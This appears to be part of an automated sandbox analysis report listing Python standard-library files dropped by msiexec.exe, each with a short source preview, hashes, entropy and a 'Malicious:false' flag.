                                                                                                                                Preview:"""Selectors module.....This module allows high-level and efficient I/O multiplexing, built upon the..`select` module primitives..."""......from abc import ABCMeta, abstractmethod..from collections import namedtuple..from collections.abc import Mapping..import math..import select..import sys......# generic events, that must be mapped to implementation-specific ones..EVENT_READ = (1 << 0)..EVENT_WRITE = (1 << 1)......def _fileobj_to_fd(fileobj):.. """Return a file descriptor from a file object..... Parameters:.. fileobj -- file object or file descriptor.... Returns:.. corresponding file descriptor.... Raises:.. ValueError if the object is invalid.. """.. if isinstance(fileobj, int):.. fd = fileobj.. else:.. try:.. fd = int(fileobj.fileno()).. except (AttributeError, TypeError, ValueError):.. raise ValueError("Invalid file object: ".. "{!r}".format(fileobj)) from None.. if fd < 0:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8803
                                                                                                                                Entropy (8bit):4.563820102763972
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0x+ykEgEzeDlpO/ki7QqpiG9GikHQ/aBKC8rFo:07kEgEzeDlpO/kiJpa9BYO
                                                                                                                                MD5:D72FAB00C3F5E7AED0B707D03A30CB02
                                                                                                                                SHA1:54751E0C54FB64364A9989D9D7B519C3D1E293EF
                                                                                                                                SHA-256:0C8AC8DCB31AB0E9B5EBFD1CC99A827BC78DEFF9966BCC7F7B6A3AB08388A9AE
                                                                                                                                SHA-512:D127A2E2F6740A2845EBF455D3501B85D60F4E452D2D48029D47584149646C2A2ED189D6B9A4D6AD544EE9102ED9D3FF2579DFE348FFC641CA7CE2D292A381C2
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Manage shelves of pickled objects.....A "shelf" is a persistent, dictionary-like object. The difference..with dbm databases is that the values (not the keys!) in a shelf can..be essentially arbitrary Python objects -- anything that the "pickle"..module can handle. This includes most class instances, recursive data..types, and objects containing lots of shared sub-objects. The keys..are ordinary strings.....To summarize the interface (key is a string, data is an arbitrary..object):.... import shelve.. d = shelve.open(filename) # open, with (g)dbm filename -- no suffix.... d[key] = data # store data at key (overwrites old data if.. # using an existing key).. data = d[key] # retrieve a COPY of the data at key (raise.. # KeyError if no such key) -- NOTE that this.. # access returns a *copy* of the entry!.. del d[key] # delete data stored at key (raises KeyError..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13851
                                                                                                                                Entropy (8bit):4.098342133535539
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TiBJXH8qfr4rCOaCDCCaZUCELCrC46CBJ/WKCvCCxrJMBCSYCieC1eCEyCS412/u:TiBJXH8qf/qd67WaaZaUT66T6T1gzji
                                                                                                                                MD5:618BD4282F39939BF6F935F67D4107C7
                                                                                                                                SHA1:42E6CD923D7EE305A0D70F6BA861DE587EC2F444
                                                                                                                                SHA-256:731C1374ED3D47C53C0C38E4898F2A21DF0B7984E730C7FF3F3B26B96B25FAC6
                                                                                                                                SHA-512:7710378DA30D5CEE798FE09FA60B2B8A7C1F4E0B288E0F37319C7AC574451CBE6B983E82A2A813CD64BBD8C04807686080AC8C7FD105E584E35AF51FFED1B5B1
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A lexical analyzer class for simple shell-like syntaxes."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998..# Input stacking and error message cleanup added by ESR, March 2000..# push_source() and pop_source() made explicit by ESR, January 2001...# Posix compliance, split(), string arguments, and..# iterator interface by Gustavo Niemeyer, April 2003...# changes to tokenize more like Posix shells by Vinay Sajip, July 2016.....import os..import re..import sys..from collections import deque....from io import StringIO....__all__ = ["shlex", "split", "quote", "join"]....class shlex:.. "A lexical analyzer class for simple shell-like syntaxes.".. def __init__(self, instream=None, infile=None, posix=False,.. punctuation_chars=False):.. if isinstance(instream, str):.. instream = StringIO(instream).. if instream is not None:.. self.instream = instream.. self.infile = infile.. else:.. self.ins
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):56322
                                                                                                                                Entropy (8bit):4.557966864006271
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:pQmawxUaSvB4z+sje7D2tYy0QZGqr8TyvBZ9hmmDcEEi:pQm7TSvB4Kae7YuuDcEEi
                                                                                                                                MD5:B6432F72E88AF01D1E0407E996F46FB4
                                                                                                                                SHA1:43D641C795E9E28EB5B5090E8F1AF7BEEA641580
                                                                                                                                SHA-256:F490DCF63DF611CF79B2CA668E0A449D14C6AC7CA56CA30DD5F6DC5F8C2632C4
                                                                                                                                SHA-512:D51197E3A672D5303ABD4192604DBEAE3E5E3C6048249887DFFFA3656BB65A485734D6D996F451DF377D6CD621D7F9D1339F2261EB70BDCB069ED7DB7221C383
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Utility functions for copying and archiving files and directory trees.....XXX The functions here don't copy the resource fork or other metadata on Mac....."""....import os..import sys..import stat..import fnmatch..import collections..import errno....try:.. import zlib.. del zlib.. _ZLIB_SUPPORTED = True..except ImportError:.. _ZLIB_SUPPORTED = False....try:.. import bz2.. del bz2.. _BZ2_SUPPORTED = True..except ImportError:.. _BZ2_SUPPORTED = False....try:.. import lzma.. del lzma.. _LZMA_SUPPORTED = True..except ImportError:.. _LZMA_SUPPORTED = False...._WINDOWS = os.name == 'nt'..posix = nt = None..if os.name == 'posix':.. import posix..elif _WINDOWS:.. import nt....COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024..# This should never be removed, see rationale in:..# https://bugs.python.org/issue43743#msg393429.._USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux").._HAS_FCOPYFILE = posix and hasattr(posix, "
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2530
                                                                                                                                Entropy (8bit):4.711624840854989
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:SipTfd9QLvDh4vDgitan3vchcLysiasNuk0A942ZQR2qXZORotZuGqzCs:SiRfd9QLvt4vsit+0uustsJQRARoOj
                                                                                                                                MD5:0DCA73844D3B73C9802F6210C70DD4DE
                                                                                                                                SHA1:EABEABA84B410A8E97CA2D42B2AE48CA2B78D8EC
                                                                                                                                SHA-256:D470D65C87914AE671A202B8987437A6918AAE477942E58BDB1D0056528115F7
                                                                                                                                SHA-512:440149ABE836FFD5E4716F2474A6D0C6A0460F543A39BEC68E15651B5BC3E3294F7FC0D85C41C449224F234219809F710743E0002501D734A721B68377D39036
                                                                                                                                Malicious:false
                                                                                                                                Preview:import _signal..from _signal import *..from enum import IntEnum as _IntEnum...._globals = globals()...._IntEnum._convert_(.. 'Signals', __name__,.. lambda name:.. name.isupper().. and (name.startswith('SIG') and not name.startswith('SIG_')).. or name.startswith('CTRL_'))...._IntEnum._convert_(.. 'Handlers', __name__,.. lambda name: name in ('SIG_DFL', 'SIG_IGN'))....if 'pthread_sigmask' in _globals:.. _IntEnum._convert_(.. 'Sigmasks', __name__,.. lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'))......def _int_to_enum(value, enum_klass):.. """Convert a numeric value to an IntEnum member... If it's not a known member, return the numeric value itself... """.. try:.. return enum_klass(value).. except ValueError:.. return value......def _enum_to_int(value):.. """Convert an IntEnum member to a numeric value... If it's not an IntEnum member return the value
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):121
                                                                                                                                Entropy (8bit):4.240738818911377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:hBWtHUVeRWRsjYR0uZjOBoVTDwwGvAgKVnA4lJMov:hBmHUAzYuYOBuaXE/lJB
                                                                                                                                MD5:15ACB038B5C2E03D56F5B588A077BF22
                                                                                                                                SHA1:09A1D643B7A3D233B047324C303E6295BFD93263
                                                                                                                                SHA-256:1C99489111112D2150DB0E18BBD474FF45F78FEF80FA0E533DFD9ECFC6A3A480
                                                                                                                                SHA-512:86006F3EF7BB88E46427D023A2229C63F6BD933D37AB1D7463CE6C6FEB9021CBFF17D5BE1DFB36CCFCBBCFC53C29E5004C43C91DCD3B43AD831E1FAC06A546DC
                                                                                                                                Malicious:false
                                                                                                                                Preview:This directory exists so that 3rd party packages can be installed..here. Read the source for site.py for more details...
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23321
                                                                                                                                Entropy (8bit):4.667839495434266
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:rw2NAPbFYRmyZTm1xL0lDKPKxBj/5BrYdCQk209LSX84/sHiKKWPBD:xARYRvl0x4RSGYYQ6SrxZWN
                                                                                                                                MD5:C6B19F5D807DEB1C01B7DEC396B7F856
                                                                                                                                SHA1:9D4F4B745F798548A99A2A0424AEA670BC3235BA
                                                                                                                                SHA-256:8BD8A4BEF93AC85C9B22BE77BDB49411785EA3A039A067995FFE5D58F7BBBD79
                                                                                                                                SHA-512:769324D81599C01F395081CA339DCF588718AF77C18AB9FE18274AEDB779F627830061030E4838DE1006F6488E5326169B18EA86C49E3D0396C0527F2C8C9D60
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Append module search paths for third-party packages to sys.path.....****************************************************************..* This module is automatically imported during initialization. *..****************************************************************....This will append site-specific paths to the module search path. On..Unix (including Mac OSX), it starts with sys.prefix and..sys.exec_prefix (if different) and appends..lib/python<version>/site-packages...On other platforms (such as Windows), it tries each of the..prefixes directly, as well as with lib/site-packages appended. The..resulting directories, if they exist, are appended to sys.path, and..also inspected for path configuration files.....If a file named "pyvenv.cfg" exists one directory above sys.executable,..sys.prefix and sys.exec_prefix are set to that directory and..it is also checked for site-packages (sys.base_prefix and..sys.base_exec_prefix will always be the "real" prefixes of the Python..installation
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32047
                                                                                                                                Entropy (8bit):4.56104688711641
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:M1Pd0GQol3qrvBRA7tS71/2Gah4Z5xKL9zqdlhSqJuHvGcRQ+6PTCIMzxgE1bwOn:Mf0GQjvBnXzHqH1CsxgE11
                                                                                                                                MD5:86F2FB838F9213E80474A1E1C297D7BB
                                                                                                                                SHA1:1BE5F25897AC29D2C806EBD8C4038ED4ACAC003C
                                                                                                                                SHA-256:5D9D082FC564BB2D4554319AFFABF66603B4A23E11DBFB507BF87C7432EFC7E4
                                                                                                                                SHA-512:8305DEFAA40AE5CEBFF5A68171C0F3243F563120A3AF8AFA04051B341350D5A79462F8B6E6A9BDDD4F06DFFC06AD151F2747CCA2393F9048B07480248962EF71
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3.."""An RFC 5321 smtp proxy with optional RFC 1870 and RFC 6531 extensions.....Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]....Options:.... --nosetuid.. -n.. This program generally tries to setuid `nobody', unless this flag is.. set. The setuid call will fail if this program is not run as root (in.. which case, use this flag)..... --version.. -V.. Print the version number and exit..... --class classname.. -c classname.. Use `classname' as the concrete SMTP proxy class. Uses `PureProxy' by.. default..... --size limit.. -s limit.. Restrict the total size of the incoming message to "limit" number of.. bytes via the RFC 1870 SIZE extension. Defaults to 33554432 bytes..... --smtputf8.. -u.. Enable the SMTPUTF8 extension and behave as an RFC 6531 smtp proxy..... --debug.. -d.. Turn on debugging prints..... --help.. -h..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46558
                                                                                                                                Entropy (8bit):4.473746236373843
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:rI6W3HVctoov8k0o+wt0ZEr1kNCLCkUethIqLbgaVIT4IlZiu3fWotlAJpEgjFe/:DWatDawzrmC9tYdFg8WLE6ebT
                                                                                                                                MD5:C3ABC5CDD8659418068B809948A7E7B8
                                                                                                                                SHA1:EEB64EF5A0E91B6644F1B9AF10C32A1E92C642C1
                                                                                                                                SHA-256:8B38C3B9019C810D4164A88D4C4D2A294D5181814B03B624A5B0EDB19C638166
                                                                                                                                SHA-512:0B8BA051F43D74F187F03DB395E90A9773CFD97562D0B91F619008740794D20E14E4C0772287822BBB634A193D40710EA5683F9FE9B086A4E8999D34F1F39E69
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....'''SMTP/ESMTP client class.....This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP..Authentication) and RFC 2487 (Secure SMTP over TLS).....Notes:....Please remember, when doing ESMTP, that the names of the SMTP service..extensions are NOT the same thing as the option keywords for the RCPT..and MAIL commands!....Example:.... >>> import smtplib.. >>> s=smtplib.SMTP("localhost").. >>> print(s.help()).. This is Sendmail version 8.8.4.. Topics:.. HELO EHLO MAIL RCPT DATA.. RSET NOOP QUIT HELP VRFY.. EXPN VERB ETRN DSN.. For more info use "HELP <topic>"... To report bugs in the implementation send email to.. sendmail-bugs@sendmail.org... For local information send email to Postmaster at your site... End of HELP info.. >>> s.putcmd("vrfy","someone@here").. >>> s.getreply().. (250, "Somebody OverHere <somebody@here.my.org>").. >>> s.quit()..'''....# Author: The Dragon De Monsyne <drago
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7536
                                                                                                                                Entropy (8bit):4.8349895708955986
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:mwqbK/jkUx5LNC8ObfKwOCeidXjW6ddDDmQCpjHjKkz:mwI2MfKc+7pjD3
                                                                                                                                MD5:72251AD50B6C0F049D8088338D91825A
                                                                                                                                SHA1:C541359B308DE43F0167F80CA45DCECD1F0FCC61
                                                                                                                                SHA-256:5DBCAE201F273D89DE7B3985D7A98E18C9B7DF8536B4289CE3CFC722088E303B
                                                                                                                                SHA-512:F6E6AA203190404A1C2B07015E57FDA8E48992C2D5166F8747B922918129488811545A795BBC94EB61FD76B9C8DC0573C4B0CB816E2CD35C847F4DC6F7C4E520
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Routines to help recognizing sound files.....Function whathdr() recognizes various types of sound file headers...It understands almost all headers that SOX can decode.....The return tuple contains the following items, in this order:..- file type (as SOX understands it)..- sampling rate (0 if unknown or hard to decode)..- number of channels (0 if unknown or hard to decode)..- number of frames in the file (-1 if unknown or hard to decode)..- number of bits/sample, or 'U' for U-LAW, or 'A' for A-LAW....If the file doesn't have a recognizable type, it returns None...If the file can't be opened, OSError is raised.....To compute the total time, divide the number of frames by the..sampling rate (a frame contains a sample for each channel).....Function what() calls whathdr(). (It used to also use some..heuristics for raw data, but this doesn't work very well.)....Finally, the function test() is a simple main program that calls..what() for all files mentioned on the argument list. For dire
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):38126
                                                                                                                                Entropy (8bit):4.616748073625068
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:DMXSVL2vXF5e7ZYGW3fBp58RrNrgIUnTT6Db2DS:DQDffBMRrdgIUnTT6DSDS
                                                                                                                                MD5:DD8682F80E9AEC05AC575E451C5AF6EF
                                                                                                                                SHA1:6E5E00BFAFE57A4D05D46B099247BE10B16CD484
                                                                                                                                SHA-256:C7109A8EE69F7418D1391840178F4D87C5B041ADA78C4B3E4A9399854E8ED407
                                                                                                                                SHA-512:17BE87F5A40C082426B6B88D35047916FE215FCE03219EBCABB270C215B90026C62505699F4C46318458FA4C9C3B0F7732C661287417681C283FBF651762DB2A
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Wrapper module for _socket, providing some additional facilities..# implemented in Python....."""\..This module provides socket operations and some related functions...On Unix, it supports IP (Internet Protocol) and Unix domain sockets...On other systems, it only supports IP. Functions specific for a..socket are available as methods of the socket object.....Functions:....socket() -- create a new socket object..socketpair() -- create a pair of new socket objects [*]..fromfd() -- create a socket object from an open file descriptor [*]..send_fds() -- Send file descriptor to the socket...recv_fds() -- Receive file descriptors from the socket...fromshare() -- create a socket object from data received from socket.share() [*]..gethostname() -- return the current hostname..gethostbyname() -- map a hostname to its IP number..gethostbyaddr() -- map an IP number or hostname to DNS info..getservbyname() -- map a service name and a protocol name to a port number..getprotobyname() -- map a protoco
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28438
                                                                                                                                Entropy (8bit):4.5257634386045344
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:140jlGmx6MdZG5Ft+lNek7gaUgKck2bw8Nfxr5dghwHHOGQ/NfX:28wi0P8QywWdk/
                                                                                                                                MD5:2B328B7EC62A72815F9F74152E84ABCE
                                                                                                                                SHA1:5131208F7C107259F5EBC51D37B7F7948EFB95F1
                                                                                                                                SHA-256:BD2044C1AAF4356C2514DC28F283491901C216681374E22075CCE2C46EF9F57D
                                                                                                                                SHA-512:75F5977C01CE9FB314D8F56C800A3E4FEE974811D5A9C36C761327C5EBD72D95833D86703B775723B16DE94B9F12BBB360E54F8C093BACADFDF689855A5CA64F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Generic socket server classes.....This module tries to capture the various aspects of defining a server:....For socket-based servers:....- address family:.. - AF_INET{,6}: IP (Internet Protocol) sockets (default).. - AF_UNIX: Unix domain sockets.. - others, e.g. AF_DECNET are conceivable (see <socket.h>..- socket type:.. - SOCK_STREAM (reliable stream, e.g. TCP).. - SOCK_DGRAM (datagrams, e.g. UDP)....For request-based servers (including socket-based):....- client address verification before further looking at the request.. (This is actually a hook for any processing that needs to look.. at the request before anything else, e.g. logging)..- how to handle multiple requests:.. - synchronous (one request is handled at a time).. - forking (each request is handled by a new process).. - threading (each request is handled by a new thread)....The classes in this module favor the server type that is simplest to..write: a
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2607
                                                                                                                                Entropy (8bit):4.782580700337305
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:YOfevzhVebHd6wMTpe7d7h11pS1eBm0Tq6p6e9COnMfjUhgGnQU:YOeH4dd11cedbr9COn4jaQU
                                                                                                                                MD5:56E9464AEEC255E249414D00B5A39075
                                                                                                                                SHA1:899FDBF41346582414BC919615006626228B1A3D
                                                                                                                                SHA-256:3DF225315EFFCA29C26196714CF4653A554671EC877019B4BB9D2C0D3A951DD6
                                                                                                                                SHA-512:CC693DAEF562DE7B8F684AF49B36D1CC8CBBC427C332E9C000B87C12A96A19FC6548100EF2F77C679C011F7E1CF7A2B75C816A85540B50B1AB083222872A4F3A
                                                                                                                                Malicious:false
                                                                                                                                Preview:# pysqlite2/__init__.py: the pysqlite2 package...#..# Copyright (C) 2005 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any source distri
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3406
                                                                                                                                Entropy (8bit):4.797757905776138
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:oOeH4d8NkmXjmelfgApz8ngv8fP1gJF/vG/vm/t/wvBFh244RmsRD9v8:ofLl1BTpz8gvse/vG/vm/t/wv28sRxv8
                                                                                                                                MD5:35B14F8EE9A362B199C8F5087E51087B
                                                                                                                                SHA1:A6BD939DF6B01E84860906735770A53CC199293A
                                                                                                                                SHA-256:5D6B36C45DD0090E8AA7E827809E846D93BDD6E0A4D3324CD3A7058F7833FB6D
                                                                                                                                SHA-512:3D80AC2CD4AA45972FC450F0FC8E307045612E0251EC7F78795FF534EACB15E786491E0EFCD94550ACF36605ADF571CB7F9B0A1B1763AB5E882F7386264959DE
                                                                                                                                Malicious:false
                                                                                                                                Preview:# pysqlite2/dbapi2.py: the DB-API 2.0 interface..#..# Copyright (C) 2004-2005 Gerhard H.ring <gh@ghaering.de>..#..# This file is part of pysqlite...#..# This software is provided 'as-is', without any express or implied..# warranty. In no event will the authors be held liable for any damages..# arising from the use of this software...#..# Permission is granted to anyone to use this software for any purpose,..# including commercial applications, and to alter it and redistribute it..# freely, subject to the following restrictions:..#..# 1. The origin of this software must not be misrepresented; you must not..# claim that you wrote the original software. If you use this software..# in a product, an acknowledgment in the product documentation would be..# appreciated but is not required...# 2. Altered source versions must be plainly marked as such, and must not be..# misrepresented as being the original software...# 3. This notice may not be removed or altered from any source d
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3374
                                                                                                                                Entropy (8bit):4.814493644979349
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:x+tzfkdKSQqQAbhtPXe/dMB+GDb3rb9R5B/jdkI:8tzfkdKvAbrXe/OEGDb3b/jmI
                                                                                                                                MD5:B5E473D97E46AF8C8E0D471CA17FC3E4
                                                                                                                                SHA1:49547E57808925AC45611540E09F6B1C375EAF83
                                                                                                                                SHA-256:30769C19582B0F62506E6BF9E4F36A86F9FD92F2E5C618F770EB14DA0C05F16E
                                                                                                                                SHA-512:CD1262B666935CEEE69657A3186A4DC84EF788604E6ABD484A1D8E756283A4631149BCACE38725BD6930764C514636EA0AB77BB35B76FD07B64931276AFDAB5B
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Mimic the sqlite3 console shell's .dump command..# Author: Paul Kippes <kippesp@gmail.com>....# Every identifier in sql is quoted based on a comment in sqlite..# documentation "SQLite adds new keywords from time to time when it..# takes on new features. So to prevent your code from being broken by..# future enhancements, you should normally quote any identifier that..# is an English language word, even if you do not have to."....def _iterdump(connection):.. """.. Returns an iterator to the dump of the database in an SQL text format..... Used to produce an SQL dump of the database. Useful to save an in-memory.. database for later restoration. This function should not be called.. directly but instead called from the Connection method, iterdump()... """.... cu = connection.cursor().. yield('BEGIN TRANSACTION;').... # sqlite_master table contains the SQL CREATE statements for the database... q = """.. SELECT "name", "type", "sql".. FROM "sqli
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):238
                                                                                                                                Entropy (8bit):4.674625761918704
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:wXLo5mpZYQ42HBg1ONXvjT22JgKIsMNEQHKSGKl:wXVZjHH6w/vBgKIDpHKK
                                                                                                                                MD5:BBC0A0B4F7D38FDC4C14FF4780C1403E
                                                                                                                                SHA1:373BCABDF1BD5AC7884471B77E0F3126457BC452
                                                                                                                                SHA-256:B4C466EE8901119B467141DCC30D2BD512B3EC384911B8E33842E169FDAF19F4
                                                                                                                                SHA-512:2DA6241F1BCC354D91BE16D18362722D0ED12EF8D30BD26AB6D080ABAD90A36B88D2C657A36F66BB95E338763FD21B754D93154313AA6C5379AD6C75005E5812
                                                                                                                                Malicious:false
                                                                                                                                Preview:import warnings..warnings.warn(f"module {__name__!r} is deprecated",.. DeprecationWarning,.. stacklevel=2)....from re import _compiler as _..globals().update({k: v for k, v in vars(_).items() if k[:2] != '__'})..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):239
                                                                                                                                Entropy (8bit):4.669363088487422
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:wXLo5mpZYQ42HBg1ONXvjMQA0gKIsMNEQHKSGKl:wXVZjHH6w/4v0gKIDpHKK
                                                                                                                                MD5:F91B14486175BD8A104F6FA80F31A555
                                                                                                                                SHA1:B8FA622257A09DF1ED3DA3F01F5273AF2CF0F69D
                                                                                                                                SHA-256:A74070FD00E873127617BEE90A9FE54D2A710DFCE80CC57678992B2D1B22500B
                                                                                                                                SHA-512:BC205DCF660E3379121F6DD77D1FF0E6C9A5392D9F4938ED0782910B04B03A343FCBCCCFCC9D5F99DAFD99EA9929C723DCFE095B69053632EDF0C92874159031
                                                                                                                                Malicious:false
                                                                                                                                Preview:import warnings..warnings.warn(f"module {__name__!r} is deprecated",.. DeprecationWarning,.. stacklevel=2)....from re import _constants as _..globals().update({k: v for k, v in vars(_).items() if k[:2] != '__'})..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):236
                                                                                                                                Entropy (8bit):4.6586954272576655
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:wXLo5mpZYQ42HBg1ONXvVJgKIsMNEQHKSGKl:wXVZjHH6w/7gKIDpHKK
                                                                                                                                MD5:AE6DB8A967B0A29557CE3A27E7CEFF49
                                                                                                                                SHA1:A327808D9BD6D3459BCC2D79F6EEFB33E9F29CB1
                                                                                                                                SHA-256:7CFD6E20250E3FE0A4DE263F99ADE8B584109CE4DC5D198A26F0E1C2EB6780CA
                                                                                                                                SHA-512:DE160CD27D55EBB108B2FF39C91D504914A814B3E53834150622E728F3F5A2CAE8C34C51436E752B8538A7411E152809DA61A121EE335C05D4D1AA60037D7B44
                                                                                                                                Malicious:false
                                                                                                                                Preview:import warnings..warnings.warn(f"module {__name__!r} is deprecated",.. DeprecationWarning,.. stacklevel=2)....from re import _parser as _..globals().update({k: v for k, v in vars(_).items() if k[:2] != '__'})..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):53740
                                                                                                                                Entropy (8bit):4.776937646174261
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:tMVNLpvMPKK444abg7+0MkQMj1MnCXA+Y629sc7F4l0:WVVSPKKYabOM2MnCw+YFJ7F4a
                                                                                                                                MD5:85741223C5B8C04BE826B1E03D81D918
                                                                                                                                SHA1:E0B173E9637EF2E04EB25DA4C05274F08B5DCA14
                                                                                                                                SHA-256:FC5C7E1B0EDD3D70B2BBA87DDDCF024567E10C3CAD675999987795B9D443C894
                                                                                                                                SHA-512:9B4D704B09225F601FBF524082984F0073CFA88A79898A10C92457005ABAB9E1582B7242FC62B89DB5617CCC6DF0C3489A83E5E4FC09BE8FF7BAFB4A67CC7F2C
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Wrapper module for _ssl, providing some additional facilities..# implemented in Python. Written by Bill Janssen....."""This module provides some more Pythonic support for SSL.....Object types:.... SSLSocket -- subtype of socket.socket which does SSL over the socket....Exceptions:.... SSLError -- exception raised for I/O errors....Functions:.... cert_time_to_seconds -- convert time string used for certificate.. notBefore and notAfter functions to integer.. seconds past the Epoch (the time values.. returned from time.time()).... get_server_certificate (addr, ssl_version, ca_certs, timeout) -- Retrieve the.. certificate from the server at the specified.. address and return it as a PEM-encoded string......Integer constants:....SSL_ERROR_ZERO_RETURN..SSL_ERROR_WANT_READ..SSL_ERROR_WANT_WRITE..SSL_ERROR_WANT_X509_LOOKUP..SSL_ERROR_SYSCALL..SSL_ERROR_SSL..SSL_ERR
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5680
                                                                                                                                Entropy (8bit):5.1523236470837945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:btQUzIkdY5TVIU5zY553qt50eS52AY5LAx5UztU5ws45lz45R7J8nkwg3GCgt8Tn:ZB7dkV3YHqoeFAQAczDsQzmt8oW8TDHj
                                                                                                                                MD5:7A7143CBE739708CE5868F02CD7DE262
                                                                                                                                SHA1:E915795B49B849E748CDBD8667C9C89FCDFF7BAF
                                                                                                                                SHA-256:E514FD41E2933DD1F06BE315FB42A62E67B33D04571435A4815A18F490E0F6CE
                                                                                                                                SHA-512:7ECF6AC740B734D26D256FDE2608375143C65608934AA51DF7AF34A1EE22603A790ADC5B3D67D6944BA40F6F41064FA4D6957E000DE441D99203755820E34D53
                                                                                                                                Malicious:false
